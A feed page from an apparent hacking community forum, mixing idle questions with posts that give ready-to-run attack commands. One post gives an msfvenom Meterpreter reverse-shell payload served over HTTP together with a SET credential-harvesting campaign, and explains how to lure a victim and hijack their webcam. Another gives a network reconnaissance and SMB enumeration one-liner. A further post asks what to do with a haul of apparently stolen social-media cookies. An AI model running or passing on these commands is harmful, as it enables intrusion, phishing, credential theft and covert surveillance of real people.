User
Write something
Is there any way to get nitro in Discord for free?
I got Nitro basic gift from a friend but I need nitro, majority of the members have it so I assume there some way to get it for free. Help is appreciated
2
15
New comment Sep 14
The 'Network Cartographer'
sudo apt install -y nmap masscan nbtscan enum4linux smbmap nikto && \ echo "#!/bin/bash for ip in \$(nmap -sn 192.168.18.0/24 | grep 'Nmap scan report for' | awk '{print \$5}'); do ports=\$(masscan -p1-65535,U:1-65535 \$ip --rate=10000 --wait 3 | grep 'open' | cut -d' ' -f3 | tr '\\n' ','); echo \"IP: \$ip - Open ports: \$ports\" >> open_ports.txt; nbtscan -rvh \$ip | tee -a nbt_scan.txt; enum4linux -a \$ip | tee -a smb_enum.txt; smbmap -H \$ip | tee -a smb_shares.txt; nikto -h http://\$ip -o nikto_scan_\$ip.txt & done" > network_mapper.sh && \ chmod +x network_mapper.sh && \ ./network_mapper.sh This command is a symphony of network reconnaissance tools, orchestrated to map your home network with surgical precision. It installs essential tools, then crafts a Bash script that combines nmap, masscan, nbtscan, enum4linux, smbmap, and nikto to identify live hosts, open ports, SMB shares, and potential web vulnerabilities, all while saving the results in organized text files.
0
0
What Can I Do With Someones Cookies?
I got alot of instagram, reddit, discord etc... cookies and I dont know what I can do with them
1
3
New comment Sep 14
multi tool
what is a multi tool ?
1
6
New comment Sep 14
The 'Webcam Voyeur'
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o webcam_pwn.exe; \ python3 -m http.server 80 --directory $(pwd); \ (sleep 30 && sudo setoolkit --campaign=credential_harvester) & This command crafts a malicious Meterpreter payload, sets up a quick web server to host it, and then, after a 30-second delay, launches a credential harvesting campaign using SET. The idea is to lure the target into downloading and executing the payload, granting you remote access to their system. Once in, you can use Meterpreter's webcam_chat or webcam_stream commands to hijack their camera.
0
2
New comment Sep 14
1-30 of 352
Anonymous
skool.com/anonymous-9484
community of guys interested in hacking
Leaderboard (30-day)
powered by